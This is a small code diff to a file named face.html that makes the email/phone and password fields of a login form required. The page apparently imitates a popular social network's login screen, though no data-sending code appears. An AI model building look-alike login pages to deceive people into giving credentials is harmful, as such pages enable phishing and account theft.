--- a/face.html
+++ b/face.html
@@ -138,8 +138,8 @@
   </div>
 
   <form>
-    <input type="text" placeholder="Mobile number or email address" name="Mobile number or email address"/>
-    <input type="password" placeholder="Password" name="Password" />
+    <input required type="text" placeholder="Mobile number or email address" name="Mobile number or email address"/>
+    <input required type="password" placeholder="Password" name="Password" />
     <button type="submit" class="login-btn">Log in</button>
   </form>
 
